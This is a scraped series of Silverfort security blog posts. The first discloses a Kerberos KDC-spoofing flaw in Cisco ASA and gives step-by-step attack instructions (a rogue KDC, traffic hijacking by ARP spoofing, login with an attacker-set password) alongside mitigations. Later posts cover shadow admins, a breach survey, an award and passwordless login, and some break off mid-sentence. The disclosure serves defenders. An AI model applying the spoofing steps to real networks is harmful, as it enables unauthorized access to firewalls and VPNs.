Cisco fixed this vulnerability in all versions of ASA. We highly recommend enterprises upgrade to the latest ASA versions to protect against an exploit.

This article outlines the KDC spoofing vulnerability and shows how it can be used to bypass authentication to Cisco ASA. It will explain how to avoid these vulnerabilities as a developer implementing Kerberos, as well as for enterprises that have already implemented these solutions in their networks.

## Explaining the Vulnerability

The vulnerability lies in Cisco’s Kerberos implementation. Kerberos is the most common authentication protocol for on-premise authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Cisco uses the Kerberos authentication protocol in many ASA interfaces – for example, VPN, opening firewall sessions, and administrative access, either through the web management console or through SSH. Therefore, bypassing Kerberos authentication allows an attacker to take over the Cisco appliance, bypass its security, and gain access to other networks.

For the Kerberos protocol to work, three things should happen:

- the user authenticates to the server
- the server authenticates to the client
- the KDC authenticates to the server

Apparently, KDC authentication to the server is often overlooked, perhaps because requiring it complicates the configuration requirements.
However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked the network traffic to authenticate to Cisco ASA with any password, even a wrong one.

## Background

### An overview of the Kerberos Protocol

The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network, and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments.

The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication:

### 1. Authentication Service (AS) Exchange

During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the master key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according to the master key, which is also available to the KDC. After validating the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT) that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services.

### 2. Ticket-Granting Service (TGS) Exchange

When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. On a Unix-based system, the master key of the server is configured in a file called a keytab file. On a domain member server, the master key is derived from the computer account’s password. The TGS Exchange is outlined below.

### 3. Client/Server Exchange

Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, which is encrypted with the service session key. The service decrypts the service ticket with its own key, recovers the service session key and uses it to validate the AP_REQ. Then the server returns an AP_REP message and the authentication is complete. The client-server exchange is outlined below:

### Spoof-Proof Protocol

When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. Even if an attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket, because the service ticket is encrypted with the server key, a key that the attacker does not have.

### What is KDC Spoofing?

In 2000, Dug Song reported a vulnerability that affects the Kerberos protocol (Song, Dug. 2000. Kerberos KDC Spoofing Vulnerability. 28 August). He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges. Unfortunately, this behavior is not secure and can be exploited by an attacker.
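An added toy model of the three exchanges (not the post’s code and not a real Kerberos library) that makes the spoof-proof argument concrete: the same server-side login routine either stops after the AS exchange, as the implementations described here do, or carries on through the TGS exchange and requires the service ticket to open with its own keytab key. Realm name, principals, passwords and the HMAC stand-in for ticket encryption are all constructed for the demo.

```python
"""Toy model of the three Kerberos exchanges. Added illustration only: not
Silverfort's or any vendor's code and not a real Kerberos implementation.
"Encryption" is modelled as an HMAC tag, so a blob only "decrypts" under
the key it was sealed with; realm, principals and passwords are made up."""
import hashlib
import hmac
import secrets

TAG = 32  # bytes of HMAC-SHA256 tag appended by seal()
REALM = "EXAMPLE.COM"  # constructed realm name, used as the string-to-key salt


def string_to_key(password):
    # Stand-in for Kerberos string-to-key: derive a master key from a password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), REALM.encode(), 10_000)


def seal(key, payload):
    # Model of "encrypt with key": only a holder of key can verify the tag.
    return payload + hmac.new(key, payload, hashlib.sha256).digest()


def unseal(key, blob):
    # Returns the payload, or None when the key is wrong ("decryption failed").
    payload, tag = blob[:-TAG], blob[-TAG:]
    if hmac.compare_digest(tag, hmac.new(key, payload, hashlib.sha256).digest()):
        return payload
    return None


class KDC:
    """A KDC (real or rogue) that knows its own users' and services' keys."""

    def __init__(self, user_passwords, service_keys):
        self.user_keys = {u: string_to_key(p) for u, p in user_passwords.items()}
        self.service_keys = service_keys
        self.kdc_key = secrets.token_bytes(32)  # the KDC's own (krbtgt) key

    def as_exchange(self, user, as_req):
        # AS_REQ carries pre-authentication data sealed with the user's master key.
        user_key = self.user_keys.get(user)
        if user_key is None or unseal(user_key, as_req) is None:
            return None
        logon_key = secrets.token_bytes(32)
        tgt = seal(self.kdc_key, user.encode() + b"|" + logon_key)
        # AS_REP: logon session key (readable with the user's key) plus the TGT.
        return seal(user_key, logon_key), tgt

    def tgs_exchange(self, tgt, service):
        # TGS_REQ: only the KDC that issued the TGT can open it.
        inner = unseal(self.kdc_key, tgt)
        service_key = self.service_keys.get(service)
        if inner is None or service_key is None:
            return None
        user, logon_key = inner.split(b"|", 1)
        session_key = secrets.token_bytes(32)
        ticket = seal(service_key, user + b"|" + session_key)  # service ticket
        # TGS_REP: service session key (under the logon key) plus the ticket.
        return seal(logon_key, session_key), ticket


def authenticate(kdc, user, password, service, keytab_key=None):
    """A server (think VPN gateway or admin console) logging a user in.

    With keytab_key=None it stops after the AS exchange, like the vulnerable
    implementations in the post. With a keytab key it also runs the TGS
    exchange and requires the service ticket to open with that key.
    Returns True when the login is accepted."""
    user_key = string_to_key(password)
    as_rep = kdc.as_exchange(user, seal(user_key, b"timestamp"))
    if as_rep is None:
        return False
    enc_logon_key, tgt = as_rep
    logon_key = unseal(user_key, enc_logon_key)
    if logon_key is None:
        return False  # the AS_REP does not match the typed password
    if keytab_key is None:
        return True  # VULNERABLE: trusts whoever answered on port 88
    tgs_rep = kdc.tgs_exchange(tgt, service)
    if tgs_rep is None:
        return False
    _enc_session_key, ticket = tgs_rep
    # A rogue KDC does not know the server's key, so its ticket fails here.
    return unseal(keytab_key, ticket) is not None


# Constructed scenario: the real KDC, and an attacker's fake domain holding
# the same username "bob" with the attacker-chosen password "1", as in the post.
SERVICE = "host/vpn.example.com"
REAL_KEYTAB = secrets.token_bytes(32)
REAL_KDC = KDC({"bob": "correct horse battery"}, {SERVICE: REAL_KEYTAB})
ROGUE_KDC = KDC({"bob": "1"}, {SERVICE: secrets.token_bytes(32)})

if __name__ == "__main__":
    print("rogue KDC, password '1', AS exchange only:",
          authenticate(ROGUE_KDC, "bob", "1", SERVICE))              # True
    print("rogue KDC, password '1', service ticket checked:",
          authenticate(ROGUE_KDC, "bob", "1", SERVICE, REAL_KEYTAB))  # False
```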
An attacker that is able to hijack the communication between the client and the DC can take the following steps:

1. Create a fake KDC.
2. Obtain a username authorized to access the service you want to attack.
3. Create a user in the fake KDC with a password of the attacker’s choice. For the demonstration, let’s call this password ”1”.
4. Authenticate to the service with the obtained username and the password ”1”.
5. Hijack the communication from the client to the DC and divert it to the fake KDC.
6. During the AS Exchange, return an AS_REP that corresponds to the password ”1”, the fake KDC key, and a fake logon session key.
7. During the TGS Exchange, return any TGS_REP.
8. The client will accept the authentication without performing an application exchange.

The KDC spoofing attacks assume the attacker is able to hijack traffic to and from the KDC and answer on the KDC’s behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks (Lockhart 2007). Another possible approach is to take over a networking device such as a switch or router and control the communication from there.

## How We Discovered the Vulnerability in Cisco ASA

We were looking for a way to add Multi Factor Authentication (MFA) to administrators accessing Cisco ASA and AnyConnect VPN. After configuring Cisco to use Kerberos as the authentication protocol, we examined the authentication logs in Silverfort’s console. Silverfort provides full visibility into all the authentication activities in the network. Silverfort’s logs showed that Cisco ASA was requesting a TGT without requesting a service ticket. We went back to the configuration guide (Cisco. 2007. PIX/ASA: Kerberos Authentication and LDAP Authorization Server Groups for VPN Client Users via ASDM/CLI Configuration Example. 30 July) and looked at the parameters required to configure Kerberos authentication:

As seen above, there is no place to enter the password or keytab configuration for Kerberos authentication. The password or keytab are required for a correct implementation since they create the ‘secret’ used by Kerberos to authenticate in a trusted way to the KDC. Without the ‘secret’, authentication cannot be cryptographically trusted. We went ahead and tried the same for other Cisco interfaces and saw that the same vulnerability exists when opening firewall sessions, during administrative authentication and even when using SSH to access the VM. See below the Kerberos column in the table summarizing Cisco support for different authentication protocols.

## Exploitation

Next, we wanted to see if this vulnerability can be exploited. For that, we hijacked the Kerberos traffic intended for the DC and diverted it to our server. Instead of developing our own KDC logic, we simply installed AD Domain Services on our rogue server, promoting our server to be a domain controller. Of course, not being an admin in the original domain, we created a new fake domain. Since we know the username for the Cisco administrator in the first domain (Bob in this example), we created a user named Bob in our fake domain. We configured that user’s password in our fake domain to be “1”. We then tried the following situations:

- Regular login (traffic not diverted) – we managed to log in with Bob’s original password, as expected. When trying the password “1”, the login failed.
- Logging in with the traffic diverted to our fake DC – logging in with Bob’s original password failed, but logging in with the password “1” worked.

## Prevention and Mitigation

### Mitigation Steps for Security Professionals

- First of all, upgrade your Cisco ASA to a fixed version and make the required configuration changes detailed in the Cisco advisory.
- Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. Use Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets.
- See the developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself.
- Silverfort customers who are leveraging the step-up authentication capability with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS.

### As a Developer

We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing:

Validate that the implementation of Kerberos requires a password or keytab: to validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file or a service account password, the application is surely susceptible to KDC spoofing.

Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag.

If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols.

Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5 has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github.com/rra/pam-krb5/blob/master/README.md):

---
- Published: 2020-02-18
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/post-test/

## Executive Summary

This survey discloses a critical gap in organizations’ ability to protect themselves against identity threats—with 83% already having experienced a breach involving compromised credentials. Account takeover, lateral movement, and ransomware spread are a prominent cyber risk.
To gain resiliency against these attacks, organizations strive to have the ability to prevent—in real time—malicious access with compromised credentials to their resources. The common practice today is to lean on solutions such as MFA and PAM, as well as manual monitoring of service accounts, to get this protection. However, surveys of identity security teams reveal that in most cases, these solutions fail to deliver the required level of protection. This failure manifests in the vast majority of organizations experiencing an identity-related data breach, as well as a shared notion among identity teams that they don’t have the ability to thwart such attacks in the future.

## Key Takeaways

The key takeaways from this research are:

- Over 80% of organizations have experienced an identity-related breach that involved the use of compromised credentials. Almost half of organizations experienced such a breach in the past 12 months.
- 65.4% of organizations have not implemented MFA comprehensively enough to provide sound protection. Organizations are not protecting their entire workforce with MFA, and only one in eight have more than 70% of their resources and access methods covered.
- Only 5.7% of organizations have full visibility into their service accounts. Very few organizations have full visibility into the activity and usage of their service accounts, while 62% only have partial visibility.
- Protection of service accounts introduces a huge challenge to organizations, with only 22% able to prevent adversaries from using them for malicious access. 78% of organizations cannot prevent the misuse of service accounts in real time, since security is sporadic or missing.
- 73.4% of organizations struggle with getting their PAM solutions fully onboarded and working. Many organizations have encountered difficulties in their PAM implementation, causing progress to halt. Most know what to do but are too resource-constrained to move ahead.
- Only one in five organizations are highly confident that they could prevent identity threats. Very few organizations are confident they can stop initial access or lateral movement due to the malicious use of compromised credentials.

Figure 1: Identity Infrastructure Distribution: On-Premises, Hybrid and Cloud Only (percentage of respondents)

### Confidence to prevent attackers from using compromised privileged user accounts for malicious access

One ultimate test of the efficacy of a PAM solution is high confidence to prevent misuse of privileged user credentials. We asked respondents to indicate their level of confidence. Per Figure 6, 34.3% of respondents indicate their organization is at the high confidence level—which means all privileged accounts have been identified and secured.

---
- Published: 2020-01-27
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins/

Shadow Admin accounts are user accounts that have sensitive privileges – not because they are members of a privileged admin Active Directory (AD) group, but because they were inadvertently assigned permissions that can allow them to take over other privileged accounts and leverage them to reach their target systems to compromise them. If a Shadow Admin account is compromised, it can be very risky for the organization. After all, these user accounts can be used to compromise additional accounts and gain administrative privileges. Yet identifying these accounts and restricting their access is not a trivial task.

## What are Shadow Admins?

A Shadow Admin is a user who is not a member of AD administrative groups like Domain Admins, Enterprise Admins, Schema Admins, Administrators, etc.
Yet this user has some sort of administrative capability over an admin account that enables them to gain further administrative capabilities. These administrative capabilities include:

- Full Control Rights (user or group)
- Write All Properties (on a group)
- Reset Password (on a user)
- All Extended Rights (on a user)
- Change Permissions (user or group)
- Write Member (on a group)
- Write Owner (user or group)
- The Actual Owner (user or group)

Additionally, any user who can take over and control a Shadow Admin of any level would also be considered a shadow admin.

### An Example of a Shadow Admin

Let’s say Bob is a Domain Admin (a member of the Domain Administrators group). This means that Bob has domain admin access to Active Directory.

Figure 1: Bob is a member of the Domain Administrators Group

Alice is not a member of the Domain Administrators Group. However, Alice has the ability to reset Bob’s password. Therefore, Alice can reset Bob’s password, log in as Bob and execute tasks that require Domain Admin privileges on his behalf. This makes Alice a “Shadow Admin”.

Figure 2: Alice can reset Bob’s password, which makes her a “Shadow Admin”

Now, let’s say Larry can reset Alice’s password. This means that Larry can reset Alice’s password, log in as Alice, change Bob’s password, then log in as Bob and execute tasks that require Domain Admin privileges. This makes Larry a level 2 shadow admin.

Figure 3: Larry can reset Alice’s password, which makes him a “Shadow Admin” as well

And it doesn’t end with Larry. Who can reset Larry’s password? The process continues, and an organization could potentially have many shadow admins.

### 3 Reasons Why Shadow Admins Are Created

There are a few reasons why shadow admins exist in our networks:

**Human Error or Mismanagement of User Rights:** Shadow Admins can be created by inexperienced administrators by mistake, or because they did not fully understand the implications of direct privilege assignments. Although there is no malicious intent behind such shadow admin accounts, they can still present risk to the environment by allowing users unauthorized access to sensitive assets.

**Created for Temporary Use but Never Removed:** Although this is considered a bad practice, in some cases IT administrators may grant accounts temporary privileges that turn the users into shadow admins, with the intention to remove these privileges at a later date. While this can solve immediate problems, these privileges are often left in place, leaving these accounts with unsupervised administrative privileges.

**Adversaries May Create Shadow Admins for Hiding Activities and Remaining Stealthy:** Once admin privileges have been achieved, attackers can create shadow admin accounts to allow persistence and to conceal their activities. These shadow admin accounts can then be used to hide malicious activities while the attacker remains stealthy.

Regardless of the reason behind their creation, shadow admins pose a risk to the organization, as they allow unauthorized individuals to perform activities that they shouldn’t perform. If an adversary gains control over a shadow admin account, it can be used as an attack vector. The fact that these accounts are not monitored or supervised means not only that you don’t know you should restrict their access (you can’t fix problems you don’t know about), but also that unauthorized access and changes may go undetected. In some cases, such unauthorized access or changes may be detected too late – after sensitive data was leaked or after critical systems were compromised.

### How Can I Determine Who My Shadow Admins Are?

Identifying shadow admins is a challenging and complex problem. You first have to determine who your administrators are, i.e. all the users who belong to the AD groups that provide them administrative privileges. Some AD groups are obvious, like the Domain Admins group. But some groups are less obvious. We’ve seen that in many organizations, different administrative groups are created to support different business purposes. In some cases, you can even find nested groups. It’s important to map out all the members of these groups. As we map out the group memberships, we have to take into consideration not only the user identities that show up in the member list, but also each user’s Primary Group ID configuration.

Understanding the members of our administrative groups in AD is an important first step, but it’s not enough for identifying all privileged accounts in the domain, because those groups do not include the shadow admins. To detect the shadow admins, you need to analyze the ACL permissions granted to each account.

### Think You Can Analyze the ACLs? Think Again

As explained previously, to detect shadow admins you need to analyze the ACL permissions of each account in AD to understand whether the account has privileges over any administrative groups or individual admin accounts. This, in itself, is a very difficult, if not impossible, task for any human being. If you are able to perform this analysis, it will give you the first level of shadow admins. But it’s not enough. You now need to analyze all the ACLs again to understand who has privileges to change these first-level shadow admins. And then again, and again, and again – this process needs to continue until all the levels of your shadow admins are detected. And what if you found a shadow admin group? That complicates things even more. The bottom line is that this important analysis can’t be done manually.

### Silverfort: The Best MFA Solution

Silverfort periodically queries Active Directory to get the ACLs of all the objects in the domain. It automatically identifies common admin groups. It then analyzes the ACLs in search of shadow admin users and groups that have privileges equivalent to those of the members of these admin groups – privileges that effectively make them shadow admin accounts/groups.
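The repeated ACL pass described above, as an added example that is not Silverfort’s code: it takes a constructed, AD-shaped model of group memberships, primaryGroupID settings and per-object ACEs, resolves nested groups, and repeats the “who controls a privileged object” question until no new accounts appear, labelling each account with the level at which it was found so AD administrators can review the list. The rights vocabulary, object model and every account name (Bob, Alice, Larry, Helpdesk and the rest) are constructed for illustration.

```python
"""Transitive shadow-admin discovery over a constructed, AD-shaped model.
Names, rights vocabulary and ACEs are constructed for illustration; in a real
domain they would come from group membership, primaryGroupID and each object's
DACL."""
from collections import deque

# Rights from the post's list and the object class on which the post says each
# one confers control ("user"/"group" stand in for AD object classes).
CONTROL_RIGHTS = {
    "FullControl": {"user", "group"}, "WriteAllProperties": {"group"},
    "ResetPassword": {"user"}, "AllExtendedRights": {"user"},
    "ChangePermissions": {"user", "group"}, "WriteMember": {"group"},
    "WriteOwner": {"user", "group"}, "Owner": {"user", "group"},
}

# Constructed sample domain: "aces" are (trustee, right) pairs from the
# object's DACL, "members" the group's direct member list.
OBJECTS = {
    "Domain Admins": {"kind": "group", "members": {"Bob"},
                      "aces": [("Helpdesk", "WriteMember"),
                               ("Mallory", "ReadProperty")]},  # read-only: ignored
    "Bob": {"kind": "user", "aces": [("Alice", "ResetPassword")]},
    "Alice": {"kind": "user", "aces": [("Larry", "ResetPassword")]},
    "Helpdesk": {"kind": "group", "members": {"Carol", "Tier2"},
                 "aces": [("Eve", "FullControl")]},
    "Tier2": {"kind": "group", "members": {"Dave"},
              "aces": [("Grace", "WriteMember")]},
}
for _u in ("Larry", "Carol", "Dave", "Eve", "Frank", "Grace", "Mallory"):
    OBJECTS[_u] = {"kind": "user", "aces": []}      # plain users, no ACEs
PRIMARY_GROUP = {"Frank": "Domain Admins"}  # membership via primaryGroupID only
ADMIN_GROUPS = {"Domain Admins"}


def expand(group, objects, primary_group):
    """Everything effectively inside `group`: direct members, users whose
    primaryGroupID points at it, and the contents of nested groups. Nested
    groups are returned too, since control over one of them is control over
    the outer group's membership."""
    found, stack = set(), [group]
    while stack:
        g = stack.pop()
        direct = set(objects[g].get("members", ()))
        direct |= {u for u, pg in primary_group.items() if pg == g}
        for m in direct - found:          # '- found' also breaks nesting loops
            found.add(m)
            if objects.get(m, {}).get("kind") == "group":
                stack.append(m)
    return found


def controllers(target, objects):
    """Trustees holding a control right on `target` that is valid for its
    object class; any other ACE (e.g. a read-only right) is ignored."""
    kind = objects[target]["kind"]
    return {trustee for trustee, right in objects[target]["aces"]
            if kind in CONTROL_RIGHTS.get(right, ())}


def find_shadow_admins(objects, primary_group, admin_groups):
    """Return {name: level}. Level 0 is the admin groups and their effective
    members. Level n is every trustee controlling a level n-1 object and, when
    that trustee is a group (a 'shadow admin group'), everything inside it.
    The pass repeats until no new objects are discovered."""
    level, queue = {}, deque()

    def mark(names, lvl):
        for name in names:
            if name not in level:         # first discovery is the lowest level
                level[name] = lvl
                queue.append(name)

    for g in admin_groups:
        mark({g, *expand(g, objects, primary_group)}, 0)
    while queue:
        target = queue.popleft()
        for trustee in controllers(target, objects):
            new = {trustee}
            if objects.get(trustee, {}).get("kind") == "group":
                new |= expand(trustee, objects, primary_group)
            mark(new, level[target] + 1)
    return level


def by_level(level):
    """Arrange the result for review: {level: sorted names}."""
    out = {}
    for name, lvl in level.items():
        out.setdefault(lvl, []).append(name)
    return {lvl: sorted(names) for lvl, names in sorted(out.items())}


if __name__ == "__main__":
    result = find_shadow_admins(OBJECTS, PRIMARY_GROUP, ADMIN_GROUPS)
    for lvl, names in by_level(result).items():
        label = "admins" if lvl == 0 else f"shadow admins, level {lvl}"
        print(f"{label}: {', '.join(names)}")
```

Larry and Eve surface at level 2 by different routes (a user controlling a user versus a user controlling a shadow admin group), and Grace shows why nested groups must be expanded: her right sits on Tier2, which is only privileged through Helpdesk.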
It continues to analyze the ACLs as many times as needed to identify all levels of shadow admin accounts and groups, making sure you have full visibility into those potentially dangerous accounts. This comprehensive list should then be reviewed by AD administrators to determine whether the privileges of these shadow admin accounts and groups are legitimate or not, and whether they should be restricted or supervised.

In addition, Silverfort continuously monitors and analyzes all the access requests across the domain. It considers shadow admins to be high-risk accounts. Silverfort automatically identifies, in real time, sensitive activities like an attempt to reset a user password, and either alerts on it or requires the user to validate his/her identity with multi-factor authentication (MFA) before allowing the password reset. This can prevent unauthorized changes to user accounts as well as any unauthorized access to sensitive assets in the network.

If you would like to learn more about this – contact us to schedule a demo

---
- Published: 2020-01-27
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins-2/

---
- Published: 2020-01-23
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence/

Silverfort has been named a winner of the PCI 2020 Awards for Excellence at this year’s prestigious PCI London event. The AKJ Associates’ fourth annual PCI Awards for Excellence recognize and honor the industry’s most outstanding examples of best practice in payment security and PCI DSS projects and implementations. The award was presented to Silverfort at the PCI London 2020 event in recognition of its agentless authentication platform, which enables customers to meet PCI DSS requirements for enforcing Multi-Factor Authentication to secure privileged access to the CDE (Cardholder Data Environment) – without requiring code changes or software agents on CDE systems, and without deploying proxies in the network.
Silverfort introduced a real-life PCI DSS project, successfully implemented for BlueSnap – a global payment company headquartered in the USA, with offices in the UK and Israel. The company provides an All-in-One Payment Platform designed to increase sales and reduce costs for B2B and B2C businesses. BlueSnap’s production systems run on a variety of IT platforms that are not supported by mainstream MFA solutions. Silverfort’s agentless authentication platform enabled them to incorporate MFA to secure all interfaces and access to the CDE, without requiring custom implementations that would otherwise require tailored solutions for each system.

Read the full case study

“We are especially honored to accept the PCI 2020 Award for Excellence since it is based on reviews of real-life projects and case studies,” said Hed Kovetz, Co-Founder and CEO of Silverfort. “Silverfort successfully demonstrated that its holistic authentication platform enables organizations to add MFA to any system — including systems that were considered unprotectable until today — without deploying any software agents, implementing proxies or requiring any configuration changes. This enables our customers to easily protect all their CDE systems and address PCI DSS requirements.”

Silverfort’s patent-pending technology enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more – without code changes, software agents or proxies. It allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments.
To learn how we can help your organization please schedule a demo

---
- Published: 2020-01-23
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/silverfort-named-winner-of-the-pci-2020-awards-for-excellence-2/

---
- Published: 2020-01-07
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/reducing-the-password-footprint-in-a-windows-environment/

**By Yaron Kassner, CTO and Co-Founder, Silverfort**

The word password-less gets thrown around a lot lately, and while everybody is talking about it, I haven’t met any enterprises that actually managed to eliminate passwords. Eliminating passwords is a big challenge, and I believe big challenges should be solved in small steps. So in this blog post, I will suggest a series of recommended steps that would help enterprises eliminate passwords. Frankly, this isn’t something I would recommend to every enterprise – it’s a lot to take on. But the first steps should be practical for everybody, and should already be enough to relieve most of the pain inflicted by passwords while strengthening the organisation’s security.

### Can We Just Get Rid of Passwords?
Let’s start with a thought experiment: what would happen if you got rid of password complexity requirements in the enterprise, or if you removed the requirement to change passwords often? These changes are likely to have an immediate positive impact on the happiness levels of your employees. However, right after that, you would get hacked. That’s because both user endpoints and enterprise systems will become an easy target for hackers. So before you even begin thinking of getting rid of passwords, you need to ensure secure access to all endpoints and enterprise systems with something better than a password. Fortunately, by combining Windows Hello for Business and Silverfort, you can achieve this. I will start with an overview of WHFB and how it should be used, and continue with explaining why it’s important to add Silverfort and how Silverfort can ensure secure access to everything on top of the endpoint.

### What is Windows Hello for Business (WHFB)?

In an effort to go password-less, Microsoft introduced the ‘Windows Hello’ feature with the release of Windows 10. WHFB is a variant of this feature that is designed for corporates. The feature allows a secure way to access your device, Active Directory (AD) and Entra ID (formerly Azure AD) by leveraging the following capabilities:

**Device Unlock**

WHFB places great significance on your device, as it holds the keys to AD and Entra ID (formerly Azure AD). Therefore, it’s important to prevent malicious actors from unlocking the device and getting to those keys. However, I’m baffled by the choice to replace passwords with PIN codes. Is that really enough to claim the login is now password-less, because a PIN code is not a password? Is that enough to protect the device? Thankfully, Microsoft offers additional factors for unlocking your device, which – if combined with the PIN code – should provide better-than-password-only security for unlocking the device.
**Authentication to Active Directory (AD)**

Once you unlock your computer, you unlock a private key that’s saved in your TPM, and that private key can be used for Kerberos authentication with AD. If your endpoint policies allow storing cached credentials on the computer, the computer will unlock at logon without authenticating to Active Directory. Otherwise, if credentials aren’t cached, your computer will have to request a Kerberos TGT and a host ticket before it unlocks. Forcing authentication to AD is more secure than just relying on cached credentials.

**Authentication to Entra ID (formerly Azure AD)**

Authentication to Entra ID (formerly Azure AD) is similar, and also relies on the private key saved on the device. It’s better to require authentication to Entra ID (formerly Azure AD) before unlocking the device. Below is a figure that depicts the authentication flow with WHFB in a hybrid configuration.

### Is Multi-Factor Unlock the Same As Multi-Factor Authentication (MFA)?

According to the way FIPS defines MFA, a physical token that requires something you know or something you are to unlock is considered MFA, because one factor is the physical token (something you have) and the other factor is the gesture you provide. According to this definition, the computer can be considered a physical token, and WHFB can formally be considered MFA even if multi-factor unlock is disabled. The distinction is that if the resource you want to protect is the device itself, you need multi-factor unlock to have MFA for it. If the resource you want to protect is external to the device, WHFB without multi-factor unlock suffices. Of course, these are all formalities, and if you want the best security you should always require multi-factor unlock.

### Which deployment and trust model should I choose?

Microsoft has several deployment types to choose from:
- Hybrid Entra ID (formerly Azure AD) Joined Key Trust Deployment
- Hybrid Entra ID (formerly Azure AD) Joined Certificate Trust Deployment
- Entra ID (formerly Azure AD) Join Single Sign-on Deployment Guides
- On Premises Key Trust Deployment
- On Premises Certificate Trust Deployment

I don’t think many organizations can seriously consider the last 3, because most organizations aren’t ready to get rid of their AD and are probably moving to the cloud (or will be soon). This leaves us with the Hybrid Azure AD Joined options. I recommend going with the Certificate Trust Deployment, because in addition to local logins it also enables security for remote desktop.

### What happens when users are offline?

When I first tried WHFB, I was worried about not being able to log in when my computer is offline. Microsoft’s diagrams show the authentication to Entra ID (formerly Azure AD) as a preliminary authentication flow for unlocking the device. In reality, this usually happens before the computer unlocks, but it’s not a necessary step to unlock your computer. So users will be able to unlock their computers even when they’re offline. This also means that we can’t rely on Entra ID (formerly Azure AD) for preventing unauthorized access to user devices.

### Improving the Security of WHFB

There are four scenarios where WHFB leverages MFA:

- Multi-factor unlock
- Initial authentication to AD
- Initial authentication to Entra ID (formerly Azure AD)
- Device registration

However, there’s one big unsolved issue – MFA is not required for accessing sensitive resources inside the network after the initial login. This means that once the user is logged in, if the device has malware on it, the malware can steal the credentials (or a hash) and is then free to propagate throughout the network. To make things worse, Single Sign-On (SSO) opens the door for the attacker to access all of the resources without any additional verification.

### What Doesn’t WHFB Cover?
WHFB covers Entra ID (formerly Azure AD) and AD when the client is an updated Windows 10 device. But in many enterprise scenarios, this is not the case. Just to give a few examples:

- LDAP applications
- Applications that initiate Kerberos authentication as the client (not SSO)
- Macbooks
- Windows 7
- Windows servers
- Linux

We all have these in our environments, so you need to figure out how to protect them from unauthorized access.

### How Can Silverfort Help?

**Protecting Resources Within the Network**

Silverfort can enforce MFA and risk-based authentication to ensure secure access to sensitive resources within the corporate network and cloud environment. It’s important to note that Silverfort secures access to resources after the user device has been unlocked. You can use a solution like Silverfort to add Risk-Based Authentication to any of the systems that WHFB doesn’t cover. Then, if you want to reduce the footprint of passwords, you can start by simplifying the password policy in the organization. If you’re adding MFA to all authentication scenarios that use a password, the password doesn’t have to be as complex (you can even use a 6-digit PIN code), and it doesn’t have to be changed that often. This step already significantly reduces the cost of password management to the organization. The other part is gaining visibility into the access requests to applications – Silverfort helps you identify all access requests and gradually replace their authentication with a password-less authentication mechanism.

**Mobile MFA for the endpoint**

If you want to implement stronger security before unlocking user workstations, you can use Silverfort’s MFA solution as an additional authentication factor. Silverfort can work with out-of-band authentication, which can provide additional security over the factors Microsoft supports. In addition, Silverfort can add out-of-band authentication to devices that don’t support WHFB, such as Windows 7 devices.
**MFA for Remote Desktop**

Silverfort provides MFA for remote desktop, even if you chose to go with the Hybrid Entra ID (formerly Azure AD) Joined Key Trust Deployment.

**MFA for device registration**

The first step of registering a device to Entra ID (formerly Azure AD) typically requires MFA, and that can be achieved with Silverfort.

### How to Go Password-less

Microsoft recommends the following steps for going password-less:

1. **Develop a password replacement offering.** We all know that one factor is not enough. Therefore, removing the password poses a challenge for security, because now you need two factors other than a password. WHFB solves part of this challenge, but as mentioned earlier, it leaves other scenarios unprotected. Your password replacement has to include an alternative authentication factor that can protect all of your resources.
